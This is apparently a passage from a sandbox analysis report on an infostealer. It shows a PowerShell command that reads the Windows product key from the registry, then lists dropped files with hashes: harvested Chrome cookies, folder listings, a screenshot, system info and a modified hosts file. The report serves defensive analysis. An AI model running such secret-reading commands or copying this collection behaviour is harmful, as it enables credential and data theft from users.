                                                                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                    4⤵
                                                                                      PID:2672

                                                                              Network

                                                                              MITRE ATT&CK Enterprise v15

                                                                              Replay Monitor

                                                                              Loading Replay Monitor...

                                                                              Downloads

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                437395ef86850fbff98c12dff89eb621

                                                                                SHA1

                                                                                9cec41e230fa9839de1e5c42b7dbc8b31df0d69c

                                                                                SHA256

                                                                                9c39f3e1ee674a289926fddddfc5549740c488686ec6513f53848a225c192ba6

                                                                                SHA512

                                                                                bc669893f5c97e80a62fc3d15383ed7c62ffc86bc986401735903019bb96a5f13e4d0f6356baa2021267503a4eb62681e58e28fcff435350e83aa425fa76cd64

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                944B

                                                                                MD5

                                                                                d0a4a3b9a52b8fe3b019f6cd0ef3dad6

                                                                                SHA1

                                                                                fed70ce7834c3b97edbd078eccda1e5effa527cd

                                                                                SHA256

                                                                                21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

                                                                                SHA512

                                                                                1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                956579897b906bbfbce6bfda8d66b25e

                                                                                SHA1

                                                                                3306899f7ad283363f2fecec741fb622d279ce54

                                                                                SHA256

                                                                                4c823b66c8aaed323ce7580d049a5da86edcd75d4c2e85ca8d27f4e7cf6df1c3

                                                                                SHA512

                                                                                2a19eff3d3239b98b34617883c9f8841241825e25766a57c526f6033aee984c7ce2f2ef9e3cc930c349d5d3ed1f70e2637a1920b445ce8ce8b4410667f22cdf5

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                7332074ae2b01262736b6fbd9e100dac

                                                                                SHA1

                                                                                22f992165065107cc9417fa4117240d84414a13c

                                                                                SHA256

                                                                                baea84fda6c1f13090b8cbd91c920848946f10ce155ef31a1df4cd453ee7e4aa

                                                                                SHA512

                                                                                4ae6f0e012c31ac1fc2ff4a8877ce2b4667c45b6e651de798318a39a2b6fd39a6f72dffa8b0b89b7a045a27d724d195656faa25a9fec79b22f37ddebb5d22da2

                                                                              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                b1b3c4190050e1382519e23dcf181eb4

                                                                                SHA1

                                                                                4209fe395518e0bf873c70132782824bc50e3f1b

                                                                                SHA256

                                                                                acbf86ca95a0a06a762cde1f5a459aabf058e351c528014e875a65da37ab6686

                                                                                SHA512

                                                                                b5868d2451c822b16f83103027682d450582c3bd8a4ebd9c844a58d27d52d34789f1963beda22e39b846a8c9ad63053ddcdbf49d3bf33d188df88a09172a2654

                                                                              • C:\Users\Admin\AppData\Local\Temp\ATGQ6.zip

                                                                                Filesize

                                                                                421KB

                                                                                MD5

                                                                                7bd9f73c1b8eb8ab557609d34fd1909f

                                                                                SHA1

                                                                                75206f37121c36d392e229664da7d122a03cbbd0

                                                                                SHA256

                                                                                3221c32e9a17b0fda6e0af8b5b671fe3bcb4f4b6d158426cf91a81aab307e552

                                                                                SHA512

                                                                                7f536d8215705c706b670504c15027ed927ac12d2bd4ee4c1332a646d7e9d6ff4ebef7d37957c294aeb9fa1dfe395bc5ae991a526a0f82f9e79dbf9929d126d6

                                                                              • C:\Users\Admin\AppData\Local\Temp\RES953B.tmp

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                f11e1f0f489159ce10d59fa88c24dae6

                                                                                SHA1

                                                                                b03a33cad31350c7daa1cd3f47463bda694109ad

                                                                                SHA256

                                                                                14b2ef6b9e8a4cb83f94f39010f76993d26f1ca3e32b0e91497d763b18106fee

                                                                                SHA512

                                                                                20013cdca6298649400f77c07c9b3bac8a5b2dd09c4be069c4288822025030e04eeefc3469a0d63d5ccd1a8a3e4d5623c257beb698e161fe435a5cec9fe21978

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\VCRUNTIME140.dll

                                                                                Filesize

                                                                                95KB

                                                                                MD5

                                                                                f34eb034aa4a9735218686590cba2e8b

                                                                                SHA1

                                                                                2bc20acdcb201676b77a66fa7ec6b53fa2644713

                                                                                SHA256

                                                                                9d2b40f0395cc5d1b4d5ea17b84970c29971d448c37104676db577586d4ad1b1

                                                                                SHA512

                                                                                d27d5e65e8206bd7923cf2a3c4384fec0fc59e8bc29e25f8c03d039f3741c01d1a8c82979d7b88c10b209db31fbbec23909e976b3ee593dc33481f0050a445af

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_bz2.pyd

                                                                                Filesize

                                                                                47KB

                                                                                MD5

                                                                                f6e387f20808828796e876682a328e98

                                                                                SHA1

                                                                                6679ae43b0634ac706218996bac961bef4138a02

                                                                                SHA256

                                                                                8886bd30421c6c6bfae17847002b9bf4ee4d9eee1a3be7369ee66b36e26c372b

                                                                                SHA512

                                                                                ad7cf281f2d830f9dbf66d8ef50e418b4a17a0144b6616c43d7e98b00e6f0cbafc6fe4aba4fabf2f008bb0df85553614b38ae303e5726621a804051d950e744e

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_ctypes.pyd

                                                                                Filesize

                                                                                58KB

                                                                                MD5

                                                                                48ce90022e97f72114a95630ba43b8fb

                                                                                SHA1

                                                                                f2eba0434ec204d8c6ca4f01af33ef34f09b52fd

                                                                                SHA256

                                                                                5998de3112a710248d29df76a05272775bf08a8dbc5a051a7ecb909fef069635

                                                                                SHA512

                                                                                7e6c2591805136f74c413b9633d5fdc4428e6f01e0e632b278bee98170b4f418ef2afd237c09e60b0e72076924ed0e3ffb0e2453e543b5e030b263f64568fab8

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_decimal.pyd

                                                                                Filesize

                                                                                105KB

                                                                                MD5

                                                                                2030438e4f397a7d4241a701a3ca2419

                                                                                SHA1

                                                                                28b8d06135cd1f784ccabda39432cc83ba22daf7

                                                                                SHA256

                                                                                07d7ac065f25af2c7498d5d93b1551cc43a4d4b5e8fb2f9293b647d0f7bd7c72

                                                                                SHA512

                                                                                767f2a9f9eef6ebeca95ab9652b7d0976f2ac87b9e9da1dbd3c4ccf58e8ecb0da8242f4df0b07612282c16ba85197ed0296d1052027cd48b96d61bdf678abaad

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_hashlib.pyd

                                                                                Filesize

                                                                                35KB

                                                                                MD5

                                                                                13f99120a244ab62af1684fbbc5d5a7e

                                                                                SHA1

                                                                                5147a90082eb3cd2c34b7f2deb8a4ef24d7ae724

                                                                                SHA256

                                                                                11658b52e7166da976abeeed78a940d69b2f11f518046877bea799759a17f58b

                                                                                SHA512

                                                                                46c2f9f43df6de72458ed24c2a0433a6092fd5b49b3234135f06c19a80f18f8bdbfb297e5a411cf29f8c60af342c80db123959f7317cfa045c73bd6f835eb22d

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_lzma.pyd

                                                                                Filesize

                                                                                85KB

                                                                                MD5

                                                                                7c66f33a67fbb4d99041f085ef3c6428

                                                                                SHA1

                                                                                e1384891df177b45b889459c503985b113e754a3

                                                                                SHA256

                                                                                32f911e178fa9e4db9bd797598f84f9896f99e5022f2b76a1589b81f686b0866

                                                                                SHA512

                                                                                d0caabd031fa0c63f4cfb79d8f3531ad85eda468d77a78dd3dde40ce9ac2d404fc0099c4f67579aa802fe5c6c6a464894fd88c19f1fc601f26189780b36f3f9d

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_queue.pyd

                                                                                Filesize

                                                                                25KB

                                                                                MD5

                                                                                f9d8b75ccb258b8bc4eef7311c6d611d

                                                                                SHA1

                                                                                1b48555c39a36f035699189329cda133b63e36b5

                                                                                SHA256

                                                                                b3d9763fc71b001a1a2cc430946933e3832f859eb7857b590f8daeef8017179c

                                                                                SHA512

                                                                                cbf8490501b002eec96ae6c1fa4f3684aa1cab1e63025087df92c0e857299b9b498bff91c1f301f926ff86e0dc81e8f0c17db992366bed3cd9f41bcae43542db

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_socket.pyd

                                                                                Filesize

                                                                                42KB

                                                                                MD5

                                                                                0dd957099cf15d172d0a343886fb7c66

                                                                                SHA1

                                                                                950f7f15c6accffac699c5db6ce475365821b92a

                                                                                SHA256

                                                                                8142d92dc7557e8c585ea9ee41146b77864b7529ed464fdf51dfb6d797828a4a

                                                                                SHA512

                                                                                3dc0380dfc871d8cab7e95d6119f16be2f31cdde784f8f90ffddd6a43323a2988c61e343eede5e5cb347fc2af594fe8d8944644396faf2e478a3487bcf9cf9ee

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_sqlite3.pyd

                                                                                Filesize

                                                                                49KB

                                                                                MD5

                                                                                dde6bab39abd5fce90860584d4e35f49

                                                                                SHA1

                                                                                23e27776241b60f7c936000e72376c4a5180b935

                                                                                SHA256

                                                                                c84e5f739ce046b4582663a3017f31fe9ae5e706e087ac4c5ff11c7bba07b5f9

                                                                                SHA512

                                                                                8190c6befbe660096363409cb82977e9dce5ab9a78c60f3d3db9dc08a2300504f9b2058d8cfb740d7a17995267d8005392ee0f1a03fb74030286fbc7a9c287de

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\_ssl.pyd

                                                                                Filesize

                                                                                62KB

                                                                                MD5

                                                                                a4dba3f258344390ee9929b93754f673

                                                                                SHA1

                                                                                75bbf00e79bb25f93455a806d0cd951bdd305752

                                                                                SHA256

                                                                                e0aa8cfa2e383820561bce2aee35b77a6902ff383076c237c7859cd894d37f49

                                                                                SHA512

                                                                                6201e0d840f85d1627db849bfaf4a32f6fc0634a16416074fe6d13329317520b0a06806ad3337a3370dcc1c1e3d1910d18c823c6a7a62efe400de36b28d1767a

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\base_library.zip

                                                                                Filesize

                                                                                859KB

                                                                                MD5

                                                                                4c60bcc38288ed81c09957fc6b4cd7cd

                                                                                SHA1

                                                                                e7f08d71e567ea73bb30656953837314c8d715a7

                                                                                SHA256

                                                                                9d6f7b75918990ec9cd5820624130af309a2045119209bd90b4f70bc3abd3733

                                                                                SHA512

                                                                                856d97b81a2cb53dcba0136afa0782e0f3f81bea46f98e0247582b2e28870b837be3c03e87562b918ec6bc76469eecc2c22599238d191d3fba467f7031a2acaa

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\blank.aes

                                                                                Filesize

                                                                                78KB

                                                                                MD5

                                                                                f9bee9bdb2a15020cde9c382a085257d

                                                                                SHA1

                                                                                f34198ca4def6cadbcd501c4f6ae0499498cc419

                                                                                SHA256

                                                                                3367d604bf7828ec4955b7984c42cfe89c2436b06a6eb7fe2d2c8da2de8e7e1a

                                                                                SHA512

                                                                                1569aaa12a384438a1b5d84f61d39401c663017c25d3f3d6615a1f9588cbcdc64f3af80f664fb2304303e28f2eacfb89d865f8c1e72a4c830ed0a86a1ea587d4

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\libcrypto-1_1.dll

                                                                                Filesize

                                                                                1.1MB

                                                                                MD5

                                                                                e5aecaf59c67d6dd7c7979dfb49ed3b0

                                                                                SHA1

                                                                                b0a292065e1b3875f015277b90d183b875451450

                                                                                SHA256

                                                                                9d2257d0de8172bcc8f2dba431eb91bd5b8ac5a9cbe998f1dcac0fac818800b1

                                                                                SHA512

                                                                                145eaa969a1a14686ab99e84841b0998cf1f726709ccd177acfb751d0db9aa70006087a13bf3693bc0b57a0295a48c631d0b80c52472c97ebe88be5c528022b4

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\libffi-7.dll

                                                                                Filesize

                                                                                23KB

                                                                                MD5

                                                                                6f818913fafe8e4df7fedc46131f201f

                                                                                SHA1

                                                                                bbb7ba3edbd4783f7f973d97b0b568cc69cadac5

                                                                                SHA256

                                                                                3f94ee4f23f6c7702ab0cc12995a6457bf22183fa828c30cc12288adf153ae56

                                                                                SHA512

                                                                                5473fe57dc40af44edb4f8a7efd68c512784649d51b2045d570c7e49399990285b59cfa6bcd25ef1316e0a073ea2a89fe46be3bfc33f05e3333037a1fd3a6639

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\libssl-1_1.dll

                                                                                Filesize

                                                                                203KB

                                                                                MD5

                                                                                7bcb0f97635b91097398fd1b7410b3bc

                                                                                SHA1

                                                                                7d4fc6b820c465d46f934a5610bc215263ee6d3e

                                                                                SHA256

                                                                                abe8267f399a803224a1f3c737bca14dee2166ba43c1221950e2fbce1314479e

                                                                                SHA512

                                                                                835bab65d00884912307694c36066528e7b21f3b6e7a1b9c90d4da385334388af24540b9d7a9171e89a4802612a8b6523c77f4752c052bf47adbd6839bc4b92c

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\python310.dll

                                                                                Filesize

                                                                                1.4MB

                                                                                MD5

                                                                                3f782cf7874b03c1d20ed90d370f4329

                                                                                SHA1

                                                                                08a2b4a21092321de1dcad1bb2afb660b0fa7749

                                                                                SHA256

                                                                                2a382aff16533054e6de7d13b837a24d97ea2957805730cc7b08b75e369f58d6

                                                                                SHA512

                                                                                950c039eb23ed64ca8b2f0a9284ebdb6f0efe71dde5bbf0187357a66c3ab0823418edca34811650270eea967f0e541eece90132f9959d5ba5984405630a99857

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\rar.exe

                                                                                Filesize

                                                                                615KB

                                                                                MD5

                                                                                9c223575ae5b9544bc3d69ac6364f75e

                                                                                SHA1

                                                                                8a1cb5ee02c742e937febc57609ac312247ba386

                                                                                SHA256

                                                                                90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

                                                                                SHA512

                                                                                57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\rarreg.key

                                                                                Filesize

                                                                                456B

                                                                                MD5

                                                                                4531984cad7dacf24c086830068c4abe

                                                                                SHA1

                                                                                fa7c8c46677af01a83cf652ef30ba39b2aae14c3

                                                                                SHA256

                                                                                58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

                                                                                SHA512

                                                                                00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\select.pyd

                                                                                Filesize

                                                                                25KB

                                                                                MD5

                                                                                5c66bcf3cc3c364ecac7cf40ad28d8f0

                                                                                SHA1

                                                                                faf0848c231bf120dc9f749f726c807874d9d612

                                                                                SHA256

                                                                                26dada1a4730a51a0e3aa62e7abc7e6517a4dc48f02616e0b6e5291014a809cc

                                                                                SHA512

                                                                                034cd4c70c4e0d95d6bb3f72751c07b8b91918aabe59abf9009c60aa22600247694d6b9e232fefff78868aad20f5f5548e8740659036096fab44b65f6c4f8db6

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\sqlite3.dll

                                                                                Filesize

                                                                                622KB

                                                                                MD5

                                                                                ad4bcb50bb8309e4bbda374c01fab914

                                                                                SHA1

                                                                                a299963016a3d5386bf83584a073754c6b84b236

                                                                                SHA256

                                                                                32c0978437c9163bb12606607e88701dd79400cdde926d890cdbf6334c2b8435

                                                                                SHA512

                                                                                ba6bfa3c27fa4285eeb2978ff17cba94375d84d7c0f79150d1f2f7163c80c347b84d712da83435e8d13e27ed59ea0375edb5af2ea1ba67b2c77b6dfcb62ad65a

                                                                              • C:\Users\Admin\AppData\Local\Temp\_MEI27082\unicodedata.pyd

                                                                                Filesize

                                                                                289KB

                                                                                MD5

                                                                                dfa1f0cd0ad295b31cb9dda2803bbd8c

                                                                                SHA1

                                                                                cc68460feae2ff4e9d85a72be58c8011cb318bc2

                                                                                SHA256

                                                                                46a90852f6651f20b7c89e71cc63f0154f00a0e7cd543f046020d5ec9ef6cb10

                                                                                SHA512

                                                                                7fbdfd56e12c8f030483f4d033f1b920968ea87687e9896f418e9cf1b9e345e2be2dc8f1ea1a8afb0040a376ffb7a5dc0db27d84fb8291b50e2ed3b10c10168e

                                                                              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_c1gi10go.qbb.ps1

                                                                                Filesize

                                                                                60B

                                                                                MD5

                                                                                d17fe0a3f47be24a6453e9ef58c94641

                                                                                SHA1

                                                                                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                SHA256

                                                                                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                SHA512

                                                                                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                              • C:\Users\Admin\AppData\Local\Temp\u0vhmc3a\u0vhmc3a.dll

                                                                                Filesize

                                                                                4KB

                                                                                MD5

                                                                                6105f92f185bf61fad11c00089ac349e

                                                                                SHA1

                                                                                258cdda93d7fe562fa910778e39a548bf437607c

                                                                                SHA256

                                                                                e2d5385ab7715c7ea013747fd1a5d5bb9a6e809db9a374f9ea95e6921c1badd3

                                                                                SHA512

                                                                                874fe5a25daa0176e8ac7ce615e3ecdab69e0383c42526d16a37a8c0b23bf87e611f0de53cd2e32aaaa2ada526de675397576d208fcb718fb4633f79762c2dde

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Credentials\Chrome\Chrome Cookies.txt

                                                                                Filesize

                                                                                258B

                                                                                MD5

                                                                                24596933f5524d3c877413056ce11fff

                                                                                SHA1

                                                                                b1f283f696f5fe27e80facdb73f06455d5accebe

                                                                                SHA256

                                                                                71a4c9def0435bcbe9fd6dc099494ab7ab65bd1a733f1a0e1020e9602b3de826

                                                                                SHA512

                                                                                53e5a67e678576af439a82817c018195e674fbbccf203706af90459f7adc9560c962e293a88baa897c8a80044955dab274a2d42780dc65f17f630724f6b09cd3

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Desktop.txt

                                                                                Filesize

                                                                                742B

                                                                                MD5

                                                                                627e64ca4e7e7ac280e7cbd2dc23624c

                                                                                SHA1

                                                                                2df98cc1094324aa380d997499af2b1f4d57eecc

                                                                                SHA256

                                                                                b555477227871cdbf45009579d626f6f328696b9b3bac58f9dfb5d6ae687567c

                                                                                SHA512

                                                                                daf789280ac0997d7a80d608d056cd11392898ffeccbd549bbba3558d8f599b49573526f4d9fb116e5654e213508f9819bd69d687d9a1e03675521e8607d7e46

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Documents.txt

                                                                                Filesize

                                                                                1KB

                                                                                MD5

                                                                                81dc8504f60179460b91ba48cdbc74ae

                                                                                SHA1

                                                                                87090a0a4973e385148d0deb34fede9f667ae56e

                                                                                SHA256

                                                                                d324f978da6e0182d308474adbaad7e69e8d7245a3bfde5a1f8814c7499c9592

                                                                                SHA512

                                                                                293ef52ab2452d1a6b932b47e025f1a70a6b6ab528ae853d25c17f2d4a71edd45a13c8fd874189c2a1b7f713fac3e15039f87da6dcd1f97a0e8e6eb1b676b5cf

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Downloads.txt

                                                                                Filesize

                                                                                769B

                                                                                MD5

                                                                                4c3cd727c89b796a29fbe1988c1fddb6

                                                                                SHA1

                                                                                1fc0c759896221d67b459c86a83c9a34aef54d8d

                                                                                SHA256

                                                                                646cea2217268b220666a65d9a7fdb002f71eb18228ef81dc5d7de593e929417

                                                                                SHA512

                                                                                8c1f1e61b3e6086b303c19bfce5387910b2ca2ca20484dee1cee0295271d37c9e89f7edf3b25c56c22569480b1814870518be18a7e9f8fc011b14631c9e9a8a4

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Music.txt

                                                                                Filesize

                                                                                288B

                                                                                MD5

                                                                                5d7417eb803730d556d9c19c53f226dc

                                                                                SHA1

                                                                                6ab7026d0c0df631489ed9d8f283f5772b3f0ff3

                                                                                SHA256

                                                                                83968c9358d9a8f97ff6cac9fff0e62c0a5324ff1f8b40a99d0e467a888fbdbe

                                                                                SHA512

                                                                                c305cf4550a166cbc9836fa325755a370e106e6b87e27c1b68b4b98a68dbbbbc70c242a31962ae8900d92346d0e464bfc7f463e0b97599963d0c3dd6e32f0b1a

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Pictures.txt

                                                                                Filesize

                                                                                900B

                                                                                MD5

                                                                                ba15fcfdd65592c3a6e6e5b47024e580

                                                                                SHA1

                                                                                64003c9e21a6d51d1b5a4cbb219692d0be9e2031

                                                                                SHA256

                                                                                2df21b193b1eb2510ec6374aa8c9eb8fe267a1ca5bcfffec448e7e48c8a6ba75

                                                                                SHA512

                                                                                b6adadb4761468866e159213e27cf65817d8e0e79c2fba61eb762e74f6389f3f244c8660672bc1ccda59664ec18c564bd63d31213ab4a5a83004ec55dd54306d

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Directories\Videos.txt

                                                                                Filesize

                                                                                30B

                                                                                MD5

                                                                                e140e10b2b43ba6f978bee0aa90afaf7

                                                                                SHA1

                                                                                bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                                                                SHA256

                                                                                c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                                                                SHA512

                                                                                df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \Display (1).png

                                                                                Filesize

                                                                                417KB

                                                                                MD5

                                                                                a27b637cc5277b2e9b06a741c72c9247

                                                                                SHA1

                                                                                599fcdd632f259a627aff39f3a7034b74f813794

                                                                                SHA256

                                                                                ec66094ea5e1252aa95c10f110bb68ae328c9a742b4e09f81d06fb2f385a5101

                                                                                SHA512

                                                                                94b85c4f50cc9f685f512f916965c406bdf8e2d4a6aee66a13e6225acf604045e9552e0f4cc4db64336bf4125e2b167d15370a57eeb4051c29ce29ee8ef2e9c1

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \System\MAC Addresses.txt

                                                                                Filesize

                                                                                232B

                                                                                MD5

                                                                                86b658d8fff6acddfe5fc9d7bd07f502

                                                                                SHA1

                                                                                136562347ca210fd335892bac4f4dbde56b0e655

                                                                                SHA256

                                                                                6f2bf76ba094bd0130ac2472e5a83b4ae5972241d01aff26e2974229f566fade

                                                                                SHA512

                                                                                f7a18119700bf0e44cf38e74d1218de91778fe6a67a7fe582c13865a6a445fba97e4444bd73f11ffcab5867199f03b15a5936b2de9677b30ebb638fe3305ec2e

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \System\System Info.txt

                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                b6f8a11f20418c4fabce43b9068b5d1a

                                                                                SHA1

                                                                                db99a83031ecce16ae5fd15c8c2c5189ab9171c9

                                                                                SHA256

                                                                                df145392ffea227a928f08207b28837c9badb3b89917eff15b38791804b9c168

                                                                                SHA512

                                                                                809e6ecf54e58924cab68a85c96ab29d9df96328e28967a3dfbadf0aa22f2fb5e72c44616c320d0c73bc80b86514e2a0d6a01ed73ad83e4edf7d6cc5c197a997

                                                                              • C:\Users\Admin\AppData\Local\Temp\    ‍     \System\Task List.txt

                                                                                Filesize

                                                                                11KB

                                                                                MD5

                                                                                d0bdd4f661852a87896841705db23fa7

                                                                                SHA1

                                                                                6ce3878c0a8d1685b07907b198f5060894f6cee3

                                                                                SHA256

                                                                                6901f214c6580041128a798f06cf0e55d4612d4c6e0ff6191428e506f4168f0e

                                                                                SHA512

                                                                                d176be6f7ec0fd33ea62564eb3a7d31c238a99316bcf2a64306067bec48c26d2071d0decc8b48bfe66d332e619488d4f871d88b4d44ba6c9e2943eff2d77c575

                                                                              • C:\Windows\System32\drivers\etc\hosts

                                                                                Filesize

                                                                                2KB

                                                                                MD5

                                                                                f99e42cdd8b2f9f1a3c062fe9cf6e131

                                                                                SHA1

                                                                                e32bdcab8da0e3cdafb6e3876763cee002ab7307

                                                                                SHA256

                                                                                a040d43136f2f4c41a4875f895060fb910267f2ffad2e3b1991b15c92f53e0f0

                                                                                SHA512

                                                                                c55a5e440326c59099615b21d0948cdc2a42bd9cf5990ec88f69187fa540d8c2e91aebe6a25ed8359a47be29d42357fec4bd987ca7fae0f1a6b6db18e1c320a6

                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u0vhmc3a\CSCAC3DB69E6D2E4EAE88A2C348511D1099.TMP

                                                                                Filesize

                                                                                652B

                                                                                MD5

                                                                                1348452d57ef7831bd265473b5df11e6

                                                                                SHA1

                                                                                ceb90ee28b4bce8b0c4eb478fcf7aa6f66213d1a

                                                                                SHA256

                                                                                c006c5ab1090ec06fb6ccd2c83dbf52e7c6e53610ba39dda46510ecfbb8d050e

                                                                                SHA512

                                                                                e8a9a1a85ffe1d20c05d46c2a78d5ff85634b10361cfdbb0c4ab0672a671c97ffb484be41bfff64b1e1e07f4eb732a195ef89ee5e62f81591526af1963e20203

                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u0vhmc3a\u0vhmc3a.0.cs

                                                                                Filesize

                                                                                1004B

                                                                                MD5

                                                                                c76055a0388b713a1eabe16130684dc3

                                                                                SHA1

                                                                                ee11e84cf41d8a43340f7102e17660072906c402

                                                                                SHA256

                                                                                8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                SHA512

                                                                                22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                              • \??\c:\Users\Admin\AppData\Local\Temp\u0vhmc3a\u0vhmc3a.cmdline

                                                                                Filesize

                                                                                607B

                                                                                MD5

                                                                                609fd1598931499541b3e74cf02cdffa

                                                                                SHA1

                                                                                dbca0f1aebb5917ffe01458ce2f27cf292b92ec1

                                                                                SHA256

                                                                                4752c9496e6078dfb1027219fa1d4126e36c287353ef5804e09e2ab185389be2

                                                                                SHA512

                                                                                d322c3f37092e8d6ab336dc14ba584da71da03a0da4ce66bbae8ab946ddf697c85221ba75d6e9e03fd0baa330df8c5be658a4075766f9c71d85dbbc956b3ceb0

                                                                              • memory/3036-91-0x000001C8E54B0000-0x000001C8E54D2000-memory.dmp

                                                                                Filesize

                                                                                136KB

                                                                              • memory/3320-145-0x00000161F0520000-0x00000161F0528000-memory.dmp

                                                                                Filesize

                                                                                32KB

                                                                              • memory/4712-76-0x00007FFDC5E60000-0x00007FFDC5E75000-memory.dmp

                                                                                Filesize

                                                                                84KB

                                                                              • memory/4712-56-0x00007FFDC74A0000-0x00007FFDC74B8000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/4712-105-0x00007FFDC7390000-0x00007FFDC73AF000-memory.dmp

                                                                                Filesize

                                                                                124KB

                                                                              • memory/4712-81-0x00007FFDC74A0000-0x00007FFDC74B8000-memory.dmp

                                                                                Filesize

                                                                                96KB

                                                                              • memory/4712-82-0x00007FFDC1460000-0x00007FFDC1578000-memory.dmp

                                                                                Filesize

                                                                                1.1MB

                                                                              • memory/4712-78-0x00007FFDC5F20000-0x00007FFDC5F4C000-memory.dmp

                                                                                Filesize

                                                                                176KB

                                                                              • memory/4712-79-0x00007FFDCB3C0000-0x00007FFDCB3CD000-memory.dmp

                                                                                Filesize

                                                                                52KB

                                                                              • memory/4712-32-0x00007FFDCB720000-0x00007FFDCB72F000-memory.dmp

                                                                                Filesize

                                                                                60KB

                                                                              • memory/4712-150-0x00007FFDC5E80000-0x00007FFDC5E99000-memory.dmp

                                                                                Filesize

                                                                                100KB

                                                                              • memory/4712-31-0x00007FFDCB760000-0x00007FFDCB784000-memory.dmp

                                                                                Filesize

                                                                                144KB

                                                                              • memory/4712-206-0x00007FFDC5110000-0x00007FFDC513E000-memory.dmp

                                                                                Filesize

                                                                                184KB

                                                                              • memory/4712-70-0x00007FFDC19C0000-0x00007FFDC1E26000-memory.dmp

                                                                                Filesize

                                                                                4.4MB

                                                                              • memory/4712-71-0x00007FFDCB760000-0x00007FFDCB784000-memory.dmp

                                                                                Filesize

                                                                                144KB

                                                                              • memory/4712-73-0x0000028D9BE60000-0x0000028D9C1D5000-memory.dmp

                                                                                Filesize

                                                                                3.5MB

                                                                              • memory/4712-74-0x00007FFDC1580000-0x00007FFDC18F5000-memory.dmp

                                                                                Filesize

                                                                                3.5MB

                                                                              • memory/4712-72-0x00007FFDC1900000-0x00007FFDC19B8000-memory.dmp

                                                                                Filesize

                                                                                736KB

                                                                              • memory/4712-66-0x00007FFDC5110000-0x00007FFDC513E000-memory.dmp

                                                                                Filesize

                                                                                184KB

                                                                              • memory/4712-64-0x00007FFDCB710000-0x00007FFDCB71D000-memory.dmp

                                                                                Filesize

                                                                                52KB

